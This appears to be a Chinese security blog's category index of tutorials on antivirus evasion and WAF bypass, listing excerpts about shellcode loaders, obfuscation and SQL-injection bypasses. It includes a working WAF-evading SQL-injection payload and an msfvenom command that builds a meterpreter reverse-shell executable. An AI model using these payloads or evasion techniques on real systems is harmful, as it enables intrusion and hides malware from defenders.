免杀和bypass
关注
分享
扫一扫
文章平均质量分 83
web类bypass和免杀知识分享
乌鸦安全
微信公众号:乌鸦安全
展开
-
CMD命令混淆学习
cmd命令混淆的意义主要是bypass,混淆也不能影响原来的命令执行结果。原创 2022-06-09 19:00:23 · 2020 阅读 · 0 评论 -
【新版】掩日免杀windows Defender
掩日免杀是一个非常优秀的项目,目前在`4月19`号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:原创 2022-06-05 16:07:41 · 7061 阅读 · 1 评论 -
c++静态免杀修正版
在Github上看到一个c++的免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒。原创 2022-05-16 18:56:02 · 1422 阅读 · 0 评论 -
Nim之套接字免杀学习
Nim这个语言属于比较小众的语言,所以被杀软盯的可能小了很多,免杀上有奇效,本次学习是看到了一个使用Nim写的Socket连接的功能,然后封装为木马,目前依旧是免杀Windows Defender的;原创 2022-03-22 21:46:33 · 6238 阅读 · 0 评论 -
SQL注入_Bypass安全狗apache主程序版本v4.0.23137绕过
更新时间:2021.10.21微信公众号:乌鸦安全说明本文发在乌鸦安全知识星球,仅限内部使用!1. 版本当前版本是最新版安全狗主程序版本号为:v4.0.23137上一次的版本为 主程序版本号为:v4.0.26655所以这次已经对安全狗进行了升级。2. 开始绕按照ling老板的笔记,继续:关键:/*//------/*/安全狗 order by 绕过id=1%27%20order%20/*//------/*/--+%20%0Aby%203--+s精简版:id=1%27%20原创 2022-03-20 20:44:42 · 2738 阅读 · 0 评论 -
pyinstaller打包逆向分析,顺便免杀Windows Defender
本文使用了最基本的shellcode加载器免杀的方法,而且一起学习了pyinstaller打包exe的反编译方式,也顺便免杀了火绒、360、Windows Defender,当然从该文章发出来的那一刻起,可能免杀就不再有效了,不过,方法千千万,免杀没有那么难。原创 2022-02-10 13:14:34 · 3556 阅读 · 1 评论 -
pyinstaller打包exe免杀和逆向浅析
本文主要对pyinstaller打包的文件进行了超简单逆向分析,在这里也有一些免杀的小小的tips,其中也参考了诸多的资料,不乏有诸多错误,希望各位师傅能够批评指正。原创 2022-01-27 16:45:05 · 7362 阅读 · 6 评论 -
RGB图片隐写术免杀
微信公众号:乌鸦安全扫取二维码获取更多信息!1. 前言目前杀软比较厉害,如果直接运行exe的话,相对来说免杀难度大一点(但也不绝对),尤其是某些厂商,针对一些打包exe的工具进行无脑杀,所以这里和大家一起学习一种新的文件分离免杀方法。这里面主要用到的是PNG图片的LSB隐写术,具体的方式可以参考https://xz.aliyun.com/t/1882简单总结下就是,shell被写到PNG的像素信息里面,再加载的时候,读取对应像素位的信息(当然,实现原理比这更复杂)..原创 2022-01-27 14:33:11 · 2832 阅读 · 0 评论 -
SQL注入-安全狗apache最新版绕过
微信公众号:乌鸦安全扫取二维码获取更多信息!01背景知识现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。tips:本文需要您提前掌握一定的基础知识!02环境配置Windows10主机phpstudy2018sqli-labs靶场安全狗apache4.0.30255当前版本是最新版安全狗(截止2021.05.17)...原创 2022-01-26 13:41:19 · 1636 阅读 · 5 评论 -
SQL注入 安全狗apache3.5.12048版本绕过
微信公众号:乌鸦安全扫取二维码获取更多信息!更新时间:2021.04.28前言没错,这次我们又来了,还是那条狗,绕过的是安全狗apache3.5.12048版本,个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件,因为当时安装之后文件就删了,这次有,后台回复关键字:安全狗3.5 获取目前我们已经发布关于sql注入的文章和教学:2019.11.20 更新sqli-labs 全部视频更新完成SQL注入-安全狗超大数据包绕过SQL...原创 2022-01-26 12:48:43 · 1331 阅读 · 0 评论 -
SQL注入 安全狗apache4.0.26655绕过
微信公众号:乌鸦安全扫取二维码获取更多信息!说明本次靶场采用经典的sqli-labs搭建,waf使用的是安全狗的apache4.0.26655版本,文章从最开始的分析到最后的结果,中间难免会有错误的地方,希望大家多多包涵和理解。上次我们发了一篇SQL注入-安全狗超大数据包绕过的文章,使用的是安全狗apache3.5.12048版本,这次是4.0系列的版本,全手动注入,后续会带来这方面的视频课程和相关tamper的编写。因为文章中的靶场搭载了公网上,所以对以前的笔记进行了打码。..原创 2022-01-26 12:02:04 · 1924 阅读 · 0 评论 -
艰难的mimikatz源码编译免杀 Windows Defender
本文mimikatz源码编译未能免杀Windows Defender,后面使用的是其他的方式,思路和源代码暂不公开,希望师傅们能够理解!原创 2022-01-25 21:40:24 · 2874 阅读 · 0 评论 -
【工具分享】免杀360&火绒的shellcode加载器
该shellcode加载器目前可以过360&火绒,Windows Defender没戏。。。原创 2022-01-20 09:58:46 · 1989 阅读 · 2 评论 -
老树开新花之shellcode_launcher免杀Windows Defender
微信公众号:乌鸦安全扫取二维码获取更多信息!免杀效果静态免杀动态免杀效果(指的是可执行命令)1. 准备条件本文中的免杀方式在我写完文章之后,免杀基本已经失效,毕竟是见光死,所以仅供各位师傅参考,内容上如有错误,希望师傅们能够指正!本文在测试时,发现可免杀最新版火绒、最新版联网360、Windows Defender最新版(关闭可疑文件上传)。本文工具已打包至我的GitHub,欢迎多多star:https://github.com/crow82.原创 2022-01-17 13:34:58 · 2654 阅读 · 0 评论 -
SQL注入-安全狗apache3.5.12048版本超大数据包绕过
更新日期:2021.04.140x01 测试条件这个是get请求的,要求对方可以接收post请求,也就是说对方应该是request在发送请求的时候,要将bp的请求方式修改为post型将安全狗的cc防攻击功能关闭0x02 代码# -*- encoding: utf-8 -*-# Time : 2021/04/14 15:33:48# Author: crowimport requests'''POST http://10.211.55.9/Less-1/ .原创 2021-06-01 22:04:18 · 586 阅读 · 0 评论 -
掩日免杀笔记
微信公众号:乌鸦安全扫取二维码获取更多信息!1. 环境攻击机: kali linux 10.211.55.23受害机: Windows10 360主动防御Windows7 火绒主动防御2. 生成exe文件在kali linux下使用msfvenom生成一个64位的exe文件msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe ...原创 2021-06-01 21:56:45 · 4825 阅读 · 3 评论 -
Invoke-Obfuscation混淆免杀过360和火绒
微信公众号:乌鸦安全扫取二维码获取目录1. 模块使用2. msfvenom下msf上线2.1 3602.2 Windows defender2.3 火绒2.4 总结3. 混淆大法4. 第一种混淆 14.1 3604.2 windows Defender4.3 火绒4.4 总结5. 第2种混淆 25.1 火绒5.2 3605.3 Windows Defender5.4 总结6. 第三种方法 36.1 3606.2 火.原创 2021-06-01 21:47:53 · 2203 阅读 · 1 评论